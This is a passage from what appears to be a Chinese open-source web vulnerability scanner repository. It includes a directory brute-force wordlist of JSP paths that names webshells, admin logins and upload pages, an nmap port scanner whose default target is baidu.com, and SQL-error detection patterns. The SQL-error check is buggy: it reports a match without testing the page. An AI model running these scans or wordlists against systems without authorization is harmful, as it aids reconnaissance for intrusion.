171 | /DataBackup/asdf.jsp
172 | /DataBackup/c99.jsp
173 | /DataBackup/cao.jsp
174 | /DataBackup/caonima.jsp
175 | /DataBackup/cmd.jsp
176 | /DataBackup/command.jsp
177 | /DataBackup/cshell.jsp
178 | /DataBackup/css.jsp
179 | /DataBackup/d99.jsp
180 | /DataBackup/default1.jsp
181 | /DataBackup/digshell0.jsp
182 | /DataBackup/digshell2.jsp
183 | /DataBackup/diy.jsp
184 | /DataBackup/diy3.jsp
185 | /DataBackup/dm.jsp
186 | /DataBackup/do.jsp
187 | /DataBackup/error.jsp
188 | /DataBackup/fuck.jsp
189 | /DataBackup/fuckyou.jsp
190 | /DataBackup/hack.jsp
191 | /DataBackup/hacker.jsp
192 | /DataBackup/hate.jsp
193 | /DataBackup/hello.jsp
194 | /DataBackup/index1.jsp
195 | /DataBackup/log.jsp
196 | /DataBackup/love.jsp
197 | /DataBackup/luck.jsp
198 | /DataBackup/m.jsp
199 | /DataBackup/main1.jsp
200 | /DataBackup/mm.jsp
201 | /DataBackup/mmm.jsp
202 | /DataBackup/my.jsp
203 | /DataBackup/myup.jsp
204 | /DataBackup/new.jsp
205 | /DataBackup/news.jsp
206 | /DataBackup/ok.jsp
207 | /DataBackup/phpinfo.jsp
208 | /DataBackup/phpspy.jsp
209 | /DataBackup/root.jsp
210 | /DataBackup/servu.jsp
211 | /DataBackup/shell.jsp
212 | /DataBackup/spy.jsp
213 | /DataBackup/su.jsp
214 | /DataBackup/temp.jsp
215 | /DataBackup/webshell.jsp
216 | /DataBackup/wish.jsp
217 | /DataBackup/woaini.jsp
218 | /DataBackup/ws.jsp
219 | /DataBackup/x.jsp
220 | /DataBackup/xiao.jsp
221 | /DataBackup/xiaolu.jsp
222 | /DataBackup/xm.jsp
223 | /DataBackup/xx.jsp
224 | /DataBackup/xxx.jsp
225 | /DataBackup/yes.jsp
226 | /DataBackup/z.jsp
227 | /DataBackup/zz.jsp
228 | /DataBackup/zzz.jsp
229 | /DataBase/%23GBooK.jsp
230 | /DataBase/DB.jsp
231 | /DataBase/TCBBS7.jsp
232 | /DataBases/%23%23%23fdkjgzschool.V2009%23.jsp
233 | /DataShop).jsp
234 | /Data_Backup.jsp
235 | /Data_Return.jsp
236 | /Database/%23database%23.jsp
237 | /Database/%23tyqiye.jsp
238 | /Database/%23tyqiyechina.jsp
239 | /Database/%23wygkcnalibaba.jsp
240 | /Database/Data.jsp
241 | /Database/DataShop).jsp
242 | /Database/DataShop.jsp
243 | /Databases/%23wrtxcn2007.jsp
244 | /Databases/%23wygkcnqywz4.jsp
245 | /Databases/wrtxcnqywz4.jsp
246 | /Databases/wygkcnqyhtml.jsp
247 | /Databases/wygkcnqywz.jsp
248 | /Databases/wygkcnqywz3.jsp
249 | /DbConnect.jsp
250 | /Default_index.jsp
251 | /EC_Admin/EC_AdminLogin.jsp
252 | /EduAdmin/Admin_Login.jsp
253 | /FCKeditor/editor/filemanager/browser/default/browser.jsp
254 | /FCKeditor/editor/filemanager/browser/default/browser.jsp?Type=all&Connector=connectors/asp/connector.jsp
255 | /Fl_Web.jsp
256 | /Foosun/Admin/login.jsp
257 | /Function/UploadProductPic.jsp
258 | /Fuzhuang_Fushi/index.jsp
259 | /Fy_SqlX.jsp
260 | /GOOGLE1bb9e40669bc959a.jsp
261 | /Gas_login.jsp
262 | /Gehang_Geye/index.jsp
263 | /GetPassword.jsp
264 | /Gongye_Zhipin/index.jsp
265 | /Guowai_Wangzhan/index.jsp
266 | /HX_LOGIN.jsp
267 | /Heike_Anquan/index.jsp
268 | /HomeManagement/Login.jsp
269 | /Hradmin/admin.jsp
270 | /Huagong_Nengyuan/index.jsp
271 | /Hz@host!.jsp
272 | /ImageMap.jsp
273 | /Images/config_inc.jsp
274 | /Inc/conndb.jsp
275 | /Include/setting.jsp
276 | /Index.jsp
277 | /InsertEmotion.jsp
278 | /Jianzhan_Sheji/index.jsp
279 | /Keji_IT/index.jsp
280 | /Kes/Admin/Admin_Login.jsp
281 | /KesAdmin_Login.jsp
282 | /Library/DbConnect.jsp
283 | /Link/upload/upload.jsp
284 | /Log.jsp
285 | /LoginAdministrator.jsp
286 | /Login_ok.jsp
287 | /LookupPass.jsp
288 | /MSOffice/cltreq.jsp
289 | /Manag_onlinedb.jsp
290 | /Manage/Default.jsp
291 | /ManageAdmin/ManageLogin.jsp
292 | /ManageLogin.jsp
293 | /Manage_backup.jsp
294 | /Manager/default.jsp
295 | /MeCMS_data.jsp
296 | /Member/FileUpLoad.jsp
297 | /Mianfei_Ziyuan/index.jsp
298 | /My-login.jsp
299 | /MySql.jsp
300 | /NBA_lanqiu/index.jsp
301 | /NBArticle.jsp
302 | /Neeao.jsp
303 | /Neeao_SqlIn.jsp
304 | /Neeao_sql_admin.jsp
305 | /NewFucker.jsp
306 | /NewsInfr.jsp
307 | /NewsUpLoad.jsp
308 | /Nonglin_Muyu/index.jsp
309 | /OaLogin.jsp
310 | /PBlog1.jsp
311 | /PBlog2.jsp
312 | /PBlog3.jsp
313 | /PoolMan.jsp
314 | /Preview.jsp
315 | /Product/manage/login.jsp
316 | /Qiche_Qipei/index.jsp
317 | /Reg/z9v8User_Reg.jsp
318 | /Reg/z9v8User_Reg1.jsp
319 | /Register/UserReg_Step1.jsp
320 | /Register/UserReg_Step2.jsp
321 | /SEM_User/admin_php/login.jsp
322 | /SK_login.jsp
323 | /SaveUpFile.jsp
324 | /Saveannounce_upload.jsp
325 | /ScanShell.jsp
326 | /Select_feedback.jsp
327 | /Server.jsp
328 | /ServerInfo.jsp
329 | /Shangwu_Maoyi/index.jsp
330 | /Shop_Login.jsp
331 | /ShowHost.jsp
332 | /ShowNews.jsp
333 | /Skyj.jsp
334 | /Sousuo_Yinqing/index.jsp
335 | /Southidceditor/upload.jsp
336 | /SqlIn/sqlIn_admin.jsp
337 | /Stats.jsp
338 | /Subsitemanage/login.jsp
339 | /Super/Index.jsp
340 | /SysAdmin/AdminLogin.jsp
341 | /SysAdmin/login.jsp
342 | /SysConfig.jsp
343 | /SysUser.jsp
344 | /Sys_admin.jsp
345 | /System/Function/UploadProductPic.jsp
346 | /SystemAdmin/AdminLogin.jsp
347 | /TUNGSTENDATA.jsp
348 | /UP/UpFilea.jsp
349 | /USERok.jsp
350 | /Up_BookPicPro.jsp
351 | /Upfile_AdPia.jsp
352 | /Upfile_AdPic.jsp
353 | /Upfile_Articla.jsp
354 | /Upfile_Article.jsp
355 | /Upfile_Image.jsp
356 | /Upfile_OrderPic.jsp
357 | /Upfile_Product.jsp
358 | /Upfile_ProductPic.jsp
359 | /Upfile_Soft.jsp
360 | /Upfile_SoftPic.jsp
361 | /Upfile_pic.jsp
362 | /Upfile_pics.jsp
363 | /Upfiledd.jsp
364 | /Upfilem.jsp
365 | /Upfilep.jsp
366 | /UploadAttachment.jsp
367 | /UploadFace.jsp
368 | /UploadImage3_upload.jsp
369 | /UploadProductPic.jsp
370 | /UploadSoft/diy.jsp
371 | /Upload_Dialog.jsp
372 | /Upload_Photo.jsp
373 | /Upload_Product.jsp
374 | /Upload_ProductPic.jsp
375 | /Upload_SoftPic.jsp
376 | /Upload_user.jsp
377 | /Uploaddd.jsp
378 | /User/Reg_service.jsp
379 | /User/UserReg.jsp
380 | /User/User_Article.jsp
381 | /User/User_Space.jsp
382 | /UserJoin.jsp
383 | /UserList.jsp
384 | /UserLogin.jsp
385 | /UserManage.jsp
386 | /UserModify.jsp
387 | /UserReg.jsp
388 | /User_GetPassword.jsp
389 | /Users/Login.jsp
390 | /Wangba_Lianmeng/index.jsp
391 | /WebAdmin/eWebEditor/Admin_Login.jsp
392 | /WebAdmin/login.jsp
393 | /WebEdit/admin/upload.jsp
394 | /WebEdit/admin_login.jsp
395 | /WebEdit/db/dbwebedit%23cc495898.jsp
396 | /WebEditor/admin_login.jsp
397 | /Yingjian_Zixun/index.jsp
398 | /Yinshua_Chuban/index.jsp
399 | /Zuqiu_Tianxia/1025.jsp
400 | /Zuqiu_Tianxia/index.jsp
401 | /Zzm.jsp
402 | /__vti_inf.jsp
403 | /_admin.jsp
404 | /_vt_bin/contents.jsp
405 | /_vt_bin/fpadmin.jsp
406 | /_vti_bin/shtml.dll/nosuch.jsp
407 | /_vti_log/_vti_cnf/default.jsp
408 | /_vti_log/default.jsp
409 | /a.jsp
410 | /a0p7digshell2.jsp
411 | /a_admin.jsp
412 | /a_main.jsp
413 | /aa.jsp
414 | /aaa.jsp
415 | /about.jsp
416 | /acblog.jsp
417 | /account.jsp
418 | /acct/login.jsp
419 | /ad.jsp
420 | /ad/ad_edit.jsp
421 | /ad/upload.jsp
422 | /ad/uploadsave.jsp
423 | /ad_admin/admin_login.jsp
424 | /ad_admin_login.jsp
425 | /ad_edit.jsp
426 | /ad_index.jsp
427 | /ad_login.jsp
428 | /ad_manage.jsp
429 | /add.jsp
430 | /addFile.jsp
431 | /addPicture.jsp
432 | /add_admin.jsp
433 | /add_user.jsp
434 | /addlb.jsp
435 | /addmember.jsp
436 | /adduser.jsp
437 | /adlogin.jsp
438 | /adm.jsp
439 | /adm_login.jsp
440 | /adm_menu.jsp
441 | /adm_user.jsp
442 | /admcheck.jsp
443 | /admcheckform.jsp
444 | /admin-login.jsp
445 | /admin-login/login.jsp
446 | /admin/%23m_x%23data.jsp
447 | /admin/AdminLogin1.jsp
448 | /admin/AdminMenu.jsp
449 | /admin/Admin_Database.jsp
450 | /admin/BathUpdate.jsp
451 | /admin/FCKeditor/editor/filemanager/browser/default/browser.jsp?Type=all&Connector=connectors/asp/connector.jsp
452 | /admin/FCKeditor/editor/filemanager/upload/test.jsp
453 | /admin/LoginAdministrator.jsp
454 | /admin/Select_feedback.jsp
455 | /admin/SiteConfig.jsp
456 | /admin/SouthidcEditor/PopUp.jsp
457 | /admin/SouthidcEditor/admin_login.jsp
458 | /admin/Southidceditor/upload.jsp
459 | /admin/SysConfig.jsp
460 | /admin/Sys_db.jsp
461 | /admin/Upfile_Image.jsp
462 | /admin/Upfile_Soft.jsp
463 | /admin/Upfile_SoftPic.jsp
464 | /admin/UploadImage3_upload.jsp
465 | /admin/Upload_Image.jsp
466 | /admin/Upload_Soft.jsp
467 | /admin/Upload_SoftPic.jsp
468 | /admin/WEB-INF/classes/ContextAdmin.java/x00.jsp
469 | /admin/WebEdit/admin_login.jsp
470 | /admin/WebEditor/admin_login.jsp
471 | /admin/account.jsp
472 | /admin/ad_edit.jsp
473 | /admin/ad_login.jsp
474 | /admin/adm_menu.jsp
475 | /admin/admin_6list.jsp
476 | /admin/admin_NUpLoad.jsp
477 | /admin/admin_admin.jsp
478 | /admin/admin_ads.jsp
479 | /admin/admin_copy.jsp
480 | /admin/admin_fileup.jsp
481 | /admin/admin_h.jsp
482 | /admin/admin_index.jsp
483 | /admin/admin_login.jsp
484 | /admin/admin_main.jsp
485 | /admin/admin_mb.jsp
486 | /admin/admin_menu.jsp
487 | /admin/admin_setup.jsp
488 | /admin/admin_styles.jsp
489 | /admin/admin_template.jsp
490 | /admin/admin_upfile.jsp
491 | /admin/admin_upload.jsp
492 | /admin/admin_uploadfile.jsp
493 | /admin/admin_user.jsp
494 | /admin/adminlogin.jsp
495 | /admin/adminn.jsp
496 | /admin/admlogin.jsp
497 | /admin/asp.jsp
498 | /admin/aspcheck.jsp
499 | /admin/aspinfo.jsp
500 | /admin/b2b_sysdata.jsp
501 | /admin/backdata.jsp
502 | /admin/backdate.jsp
503 | /admin/backlogin.jsp
504 | /admin/backup.jsp
505 | /admin/code.jsp
506 | /admin/config.jsp
507 | /admin/conn.jsp
508 | /admin/controlpanel.jsp
509 | /admin/cp.jsp
510 | /admin/cz_login.jsp
511 | /admin/dama.jsp
512 | /admin/data/%23down19827.jsp
513 | /admin/data/data.jsp
514 | /admin/data/user.jsp
515 | /admin/database.jsp
516 | /admin/db.jsp
517 | /admin/dbb.jsp
518 | /admin/default.jsp
519 | /admin/default/admin.jsp
520 | /admin/default/login.jsp
521 | /admin/diy.jsp
522 | /admin/downfile.jsp
523 | /admin/eWeb/admin_login.jsp
524 | /admin/eWebEditor/admin_login.jsp
525 | /admin/eWebEditor_v280_Free/admin_login.jsp
526 | /admin/edit/admin_login.jsp
527 | /admin/edit/upload.jsp
528 | /admin/editor.jsp
529 | /admin/editor/admin_login.jsp
530 | /admin/editor/admin_style.jsp
531 | /admin/editor/editor/filemanager/upload/test.jsp
532 | /admin/editor/upload.jsp
533 | /admin/enda.jsp
534 | /admin/ew/upload.jsp
535 | /admin/ewebedit/admin_login.jsp
536 | /admin/ewebeditor/upload.jsp
537 | /admin/fckeditor/editor/filemanager/browser/default/browser.jsp?Type=Image&Connector=connectors/asp/connector.jsp
538 | /admin/get_your_passport.jsp
539 | /admin/go.jsp
540 | /admin/helps.jsp
541 | /admin/home.jsp
542 | /admin/htmedit/admin_login.jsp
543 | /admin/htmedit/db/ewebeditor.jsp
544 | /admin/htmledit/admin_login.jsp
545 | /admin/htmleditor/admin_login.jsp
546 | /admin/htmleditor/upload.jsp
547 | /admin/inc_config.jsp
548 | /admin/index_login.jsp
549 | /admin/info.jsp
550 | /admin/left.jsp
551 | /admin/login.jsp
552 | /admin/login1.jsp
553 | /admin/logina.jsp
554 | /admin/logo.jsp
555 | /admin/logout.jsp
556 | /admin/lygofa.jsp
557 | /admin/m_bian/db/%23ewebeditor.jsp
558 | /admin/main.jsp
559 | /admin/manage.jsp
560 | /admin/manage/admin.jsp
561 | /admin/manage/login.jsp
562 | /admin/md5.jsp
563 | /admin/member/login.jsp
564 | /admin/menu.jsp
565 | /admin/myup.jsp
566 | /admin/news.jsp
567 | /admin/newsinput.jsp
568 | /admin/nsclass.jsp
569 | /admin/open.jsp
570 | /admin/ows_login.jsp
571 | /admin/picup.jsp
572 | /admin/print/data_1.jsp
573 | /admin/save_upfile.jsp
574 | /admin/saveup.jsp
575 | /admin/test.jsp/info.jsp
576 | /admin/unloadimg.jsp
577 | /admin/up.jsp
578 | /admin/up_images.jsp
579 | /admin/upfile-flash.jsp
580 | /admin/upfile.jsp
581 | /admin/upfile1.jsp
582 | /admin/upfile2.jsp
583 | /admin/upfile_flash.jsp
584 | /admin/upload.jsp
585 | /admin/upload1.jsp
586 | /admin/upload2.jsp
587 | /admin/uploadPic.jsp
588 | /admin/uploadPic.jsp?actionType=mod&picName=miao.jsp
589 | /admin/upload_.jsp
590 | /admin/upload_1.jsp
591 | /admin/upload_2.jsp
592 | /admin/upload_3.jsp
593 | /admin/uploadfaceok.jsp
594 | /admin/uploadfileBanner.jsp
595 | /admin/uploadfileCases.jsp
596 | /admin/uploadfileCasesType.jsp
597 | /admin/uploadfileDown.jsp
598 | /admin/uploadfileLink.jsp
599 | /admin/uploadfileNews.jsp
600 | /admin/uploadfileNewsPic.jsp
601 | /admin/uploadfilePartners.jsp
602 | /admin/uploadfileServices.jsp
603 | /admin/uploadfileServicesType.jsp
604 | /admin/uploadfiletemp_pic.jsp
605 | /admin/uploadsave.jsp
606 | /admin/uppic.jsp
607 | /admin/user/User_Admin.jsp
608 | /admin/user/login.jsp
609 | /admin/user_login.jsp
610 | /admin/web.jsp
611 | /admin/web_login.jsp
612 | /admin/webeditor/admin_login.jsp
613 | /admin/wolf.jsp
614 | /admin/xh_login.jsp
615 | /admin/ydxzdate.jsp
616 | /admin/yns_login.jsp
617 | /admin/z9v8config.jsp
618 | /admin/z9v8conn.jsp
619 | /admin/z9v8login.jsp
620 | /admin/z9v8md5.jsp
621 | /admin/z9v8myup.jsp
622 | /admin/z9v8upfile_flash.jsp
623 | /admin/z9v8uploadPic.jsp
624 | /admin1.jsp
625 | /admin1/Admin_Login.jsp
626 | /admin123.jsp
627 | /admin2.jsp
628 | /admin3.jsp
629 | /admin4.jsp
630 | /admin666.jsp
631 | /admin888.jsp
632 | /admin999.jsp
633 | /Main.jsp
634 | /testno404page.jsp
635 | /test.jsp
636 | 


--------------------------------------------------------------------------------
/Burp_force_directory/dictionary/MDB.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/Burp_force_directory/dictionary/MDB.txt


--------------------------------------------------------------------------------
/Burp_force_directory/dictionary/PHP.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/Burp_force_directory/dictionary/PHP.txt


--------------------------------------------------------------------------------
/PortScanner.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*- 
 2 | import nmap
 3 | import socket
 4 | from urllib import parse
 5 | 
 6 | ports = '21, 22, 23, 25, 53, 80, 161, 162, 443, 445, 1080, 1433, 3306, 3389, 8080'
 7 | '''
 8 | 21      ftp
 9 | 22      ssh
10 | 23      telnet
11 | 25      smtp
12 | 53      domain
13 | 80      http
14 | 139     netbios-ssn
15 | 161/162 snmp
16 | 443     https
17 | 445     microsoft-ds
18 | 1080    socks
19 | 1433    mssql
20 | 1521    oracle
21 | 3306    mysql
22 | 3389    ms-wbt-server
23 | 8080    http-proxy
24 | '''
25 | 
26 | class PortScanner:
27 |     global ports
28 | 
29 |     def __init__(self, url):
30 |         '''
31 |         从url中获取主机名，并将其解析为对应的ip地址
32 |         '''
33 |         name = parse.urlparse(url).hostname
34 |         self.host = socket.gethostbyname(name)
35 | 
36 |     def ports_scan(self):
37 |         '''
38 |         使用nmap对指定的端口进行扫描，并将每个端口的扫描结果逐一输出
39 |         '''
40 |         host = self.host
41 |         try:
42 |             nm = nmap.PortScanner()
43 |             nm.scan(host, ports)
44 | 
45 |             print('----------------------------------------------------')
46 |             print('Host: %s (%s)' % (host, nm[host].hostname()))
47 |             print('State: %s' % nm[host].state())
48 | 
49 |             for proto in nm[host].all_protocols():
50 |                 print('-------------')
51 |                 print('Protocol: %s' % proto)
52 |                 list_ports = nm[host][proto].keys()
53 |                 for port in list_ports:
54 |                     print('port: %-6s\tname: %-12s\tstate: %-8s\tproduct: %-16s\textrainfo: %-12s\tversion: %-6s'
55 | 						% (port, nm[host][proto][port]['name'], nm[host][proto][port]['state'], nm[host][proto][port]['product'], nm[host][proto][port]['extrainfo'], nm[host][proto][port]['version']))
56 |         except Exception as e:
57 |             raise e
58 | 
59 | if __name__ == '__main__':
60 |     url = 'https://www.baidu.com'
61 |     portscanner = PortScanner(url)
62 |     portscanner.ports_scan()
63 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # AD_WebScanner
 2 | 
 3 | AD工作室精心研发漏洞安全扫描器
 4 | > 整合各大开源模块，自行加以整合
 5 | >
 6 | > python版本 ：3以上
 7 | 
 8 | # 开发约束
 9 | ## 模块构造器
10 | - 构造器的参数为URL+redis+模块特有参数,
11 | 
12 | ```python
13 | class demo(url,save_pool,....):
14 |   self.module_redis = redis.Redis(connection_pool=save_pool)
15 |   ...
16 |   
17 | ```
18 | 
19 | - `savepool`由基础模块初始化子模块时提供，子模块可直接使用`redis.Redis(connection_pool=save_pool)`连接共用存储池
20 | - 特有参数需指定默认参数，即只传入URL模块亦可单独执行
21 | - 在构造函数的方法声明内注释说明特有参数的类型
22 | - 构造器内需要包含模块的执行方法
23 | - 从基础模块的相应键名获取各模块的特殊设置，如`hget('base','spider-threads)#获取爬虫模块的线程设置值`
24 | 
25 | ## redis
26 | - 连接redis实例的名称为模块名_redis，如`spider_redis`
27 | - 模块中应省略创建存储池的过程，直接连接基础模块所创建的存储池
28 | - 建议使用redis的hash存储，类型为`'模块名':'键':'值'`，如`hset('base','url',url)`
29 | - 存储聚合数据类型时（如list/set)，使用redis的list/set存储，键名为模块名-键名，如`redis.sadd('base-input_opt','100)`
30 | - 如果使用string\list\set存储类型，即视为共用的存储对象，各模块均有读写权限
31 | - 进行redis的写入/读取操作的方法后注释说明传入/读取值的名称和类型
32 | 
33 | ## 通用约束
34 | - 模块内每个方法声明后注释传入参数的类型/说明，返回值的类型/说明
35 | - 模块的关键处理步骤需进行注释
36 | - 个人负责各自的模块，需修改他人部分的请与相应模块的负责人交流
37 | - 模块开头用注释标明作者/修改日期
38 | - 模块包含`is_finished()`方法，返回值为True或False，当模块的执行方法完成返回True,否则返回False
39 | - 模块执行返回的信息应存入redis中
40 | 
41 | 
42 | # 主要功能
43 | 
44 | - [x] 爬虫 (leslie)  
45 | - [x] 目录爆破 (xuxu)
46 | - [x] 模块化设计，框架设计 (Chernobyl)
47 | - [x] 子域名爆破 (leslie)
48 | - [ ] 命令执行类(leslie)                                      
49 | - [x] 数据库漏洞扫描(threeworld)    
50 | - [x] 弱密码爆破(leslie)        
51 | - [ ] XSS类
52 | - [ ] 敏感个人信息泄露         
53 | - [ ] 内网渗透   
54 | - [ ] 中间件扫描或者指纹扫描
55 | - [ ] 无线网络扫描
56 | - [ ] 端口扫描(xuxu)
57 | - [x] 图形化界面
58 | - to be continued
59 | 
60 | # 依赖
61 | 
62 | - requests
63 | - redis
64 | - bs4
65 | - urllib
66 | 
67 | # 可视化页面
68 | - 使用flask+html+css编写
69 | - 确保templates+static这两个文件夹在index.py的同一文件夹下
70 | - 需手动把AD_Scanner_Base.py文件中最后一行的input()给注释掉方可正常使用该模块
71 | - 用flask编译器启动index.py，在浏览器输入127.0.0.1:5000访问
72 | 
73 | # 参考
74 | https://github.com/We5ter/Scanners-Box
75 | 


--------------------------------------------------------------------------------
/Sqliscan/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AttackandDefenceSecurityLab/AD_WebScanner/59124f421202d20a2def1291799443c5635a4b69/Sqliscan/__init__.py


--------------------------------------------------------------------------------
/Sqliscan/serverinfo.py:
--------------------------------------------------------------------------------
 1 | import time
 2 | import signal
 3 | import multiprocessing
 4 | import bs4
 5 | from urllib.parse import urlparse
 6 | 
 7 | from Sqliscan import std
 8 | from Sqliscan import web
 9 | 
10 | 
11 | def init():
12 |     signal.signal(signal.SIGINT, signal.SIG_IGN)
13 | 
14 | def check(urls):
15 |     """
16 | 
17 |     """
18 | 
19 |     domains_info = []  # 
20 |     results = {}  # 
21 | 
22 |     childs = []  #
23 |     max_processes = multiprocessing.cpu_count() * 2
24 |     pool = multiprocessing.Pool(max_processes, init)
25 | 
26 |     for url in urls:
27 |         def callback(result, url=url):
28 |             results[url] = result
29 |         childs.append(pool.apply_async(__getserverinfo, (url, ), callback=callback))
30 | 
31 |     # try:
32 |     while True:
33 |         time.sleep(0.5)
34 |         if all([child.ready() for child in childs]):
35 |             break
36 |     # except Exception:
37 |     #     pool.terminate()
38 |     #     pool.join()
39 |     # else:
40 |     pool.close()
41 |     pool.join()
42 | 
43 |     # 
44 |     # 
45 |     for url in urls:
46 |         if url in results.keys():
47 |             data = results.get(url)
48 |             domains_info.append([url, data[0], data[1]])
49 |             continue
50 | 
51 |         domains_info.append([url, '', '',])
52 | 
53 |     return domains_info
54 | 
55 | def __getserverinfo(url):
56 |     """get server name and version of given domain"""
57 | 
58 |     url = urlparse(url).netloc if urlparse(url).netloc != '' else urlparse(url).path.split("/")[0]
59 | 
60 |     info = []  # to store server info
61 |     url = "https://aruljohn.com/webserver/" + url
62 | 
63 |     try:
64 |         result = web.gethtml(url)
65 |     except Exception:
66 |         raise
67 | 
68 |     try:
69 |         soup = bs4.BeautifulSoup(result, "lxml")
70 |     except:
71 |         return ['', '']
72 | 
73 |     if soup.findAll('p', {"class" : "err"}):
74 |         return ['', '']
75 | 
76 |     for row in soup.findAll('tr'):
77 |         if row.findAll('td', {"class": "title"}):
78 |             info.append(row.findAll('td')[1].text.rstrip('\r'))
79 | 
80 |     return info
81 | 


--------------------------------------------------------------------------------
/Sqliscan/sqlerrors.py:
--------------------------------------------------------------------------------
 1 | #coding = 'utf-8'
 2 | 
 3 | import re
 4 | 
 5 | #页面错误返回的特征
 6 | sql_errors = {
 7 |     "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"MySQL Query fail.*", r"SQL syntax.*MariaDB server"),
 8 |     "PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"Warning.*PostgreSQL"),
 9 |     "Microsoft SQL Server": (r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*odbc_.*", r"Warning.*mssql_", r"Msg \d+, Level \d+, State \d+", r"Unclosed quotation mark after the character string", r"Microsoft OLE DB Provider for ODBC Drivers"),
10 |     "Microsoft Access": (r"Microsoft Access Driver", r"Access Database Engine", r"Microsoft JET Database Engine", r".*Syntax error.*query expression"),
11 |     "Oracle": (r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Warning.*oci_.*", "Microsoft OLE DB Provider for Oracle"),
12 |     "IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error"),
13 |     "SQLite": (r"SQLite/JDBCDriver", r"System.Data.SQLite.SQLiteException"),
14 |     "Informix": (r"Warning.*ibase_.*", r"com.informix.jdbc"),
15 |     "Sybase": (r"Warning.*sybase.*", r"Sybase message")
16 | }
17 | 
18 | def check(html):
19 |     """
20 |     检查html页面是否含有SQLerror
21 |     :param html:
22 |     :return: (True, db)或（False, None）
23 |     """
24 |     for db, errors in sql_errors.items():
25 |         for error in errors:
26 |             if re.compile(error):
27 |                 return True,db
28 |     return False,None


--------------------------------------------------------------------------------
/Sqliscan/std.py:
--------------------------------------------------------------------------------
  1 | #coding = 'utf-8'
  2 | import time
  3 | import json
  4 | from termcolor import colored
  5 | from terminaltables import SingleTable
  6 | 
  7 | def stderr(message, end="\n"):
  8 |     """
  9 |     输出一个错误给用户
 10 |     :param message:
 11 |     :param end:
 12 |     :return:
 13 |     """
 14 |     symbol = colored("[ERR]","red")
 15 |     currenttime = colored("[{}]".format(time.strftime("%H:%M:%S")),"green")
 16 |     print("{}{}{}".format(symbol, currenttime,message),end=end)
 17 | 
 18 | def stdout(message, end="\n"):
 19 |     """
 20 |     输出一个信息给用户
 21 |     :param message:
 22 |     :param end:
 23 |     :return:
 24 |     """
 25 |     symbol = colored("[MSG]", "yellow")
 26 |     currentime = colored("[{}]".format(time.strftime("%H:%M:%S")), "green")
 27 |     print("{} {} {}".format(symbol, currentime, message), end=end)
 28 | 
 29 | def stdin(message, params, upper=False, lower=False):
 30 |     """
 31 |     询问用户输入信息
 32 |     :param message:
 33 |     :param params:
 34 |     :param upper:
 35 |     :param lower:
 36 |     :return: 用户输入的信息
 37 |     """
 38 |     symbol = colored("[OPT]","magenta")
 39 |     currentime = colored("[{}]".format(time.strftime("%H:%M:%S")), "green")
 40 |     option = input("{} {} {}: ".format(symbol, currentime, message))
 41 | 
 42 |     if upper:
 43 |         option =option.upper()
 44 |     elif lower:
 45 |         option = option.lower()
 46 | 
 47 |     while option not in params:
 48 |         option = input("{} {} {}: ".format(symbol, currentime, message))
 49 | 
 50 |         if upper:
 51 |             option = option.upper()
 52 |         elif lower:
 53 |             option = option.lower()
 54 | 
 55 |     return option
 56 | 
 57 | def showsign(message):
 58 |     """
 59 |     输出一个漏洞信息
 60 |     :param message:
 61 |     :return:
 62 |     """
 63 |     print(colored(message, "magenta"))
 64 | 
 65 | 
 66 | def fullprint(data):
 67 |     """
 68 |     输出漏洞网址的服务器信息
 69 |     :param data:
 70 |     :return:
 71 |     """
 72 | 
 73 |     # [
 74 |     #   ["index", "url", "db", server", "lang"],
 75 |     #   ["1", "sql.com", "mysql", apache", "php/5.5xxx"]
 76 |     # ]
 77 | 
 78 |     title = " VULNERABLE URLS "
 79 |     table_data = [["index", "url", "db", "server", "lang"]]
 80 |     # add into table_data by one by one
 81 |     for index, each in enumerate(data):
 82 |         table_data.append([index+1, each[0], each[1], each[2][0:30], each[3][0:30]])
 83 | 
 84 |     table = SingleTable(table_data, title)
 85 |     print(table.table)
 86 | 
 87 | 
 88 | def dumpjson(array):
 89 |     """
 90 |     以json格式存储
 91 |     :param array:
 92 |     :return:
 93 |     """
 94 |     jsondata = {}
 95 | 
 96 |     for index, result in enumerate(array):
 97 |         jsondata[index] = {
 98 |             'url': result[0].encode('utf-8'),
 99 |             'db': result[1].encode('utf-8'),
100 |             'server': result[2].encode('utf-8')
101 |         }
102 |     jsonresult = json.dumps(jsondata,cls=MyEncoder)
103 |     return jsonresult
104 | 
105 | class MyEncoder(json.JSONEncoder):
106 |     def default(self, obj):
107 |         if isinstance(obj, bytes):
108 |             return str(obj, encoding='utf-8');
109 |         return json.JSONEncoder.default(self, obj)
110 | 
111 | if __name__ == '__main__':
112 |     stderr('error')
113 |     stdout("OK")
114 |     showsign("vulnerable")
115 |     stdin("do you want to continue scanning? [Y/N]", ["Y", "N"], upper=True)


--------------------------------------------------------------------------------
/Sqliscan/useragents.py:
--------------------------------------------------------------------------------
 1 | #coding='utf-8
 2 | import random
 3 | 
 4 | def get():
 5 |     """
 6 |     随机返回user-agents
 7 |     :return: user-agents
 8 |     """
 9 | 
10 |     return random.choice(useragents)
11 | 
12 | 
13 | useragents = [
14 |     {
15 |         'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'
16 |     },
17 |     {
18 |         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'
19 |     },
20 |     {
21 |         'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36'
22 |     },
23 |     {
24 |         'User-Agent': 'Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'
25 |     },
26 |     {
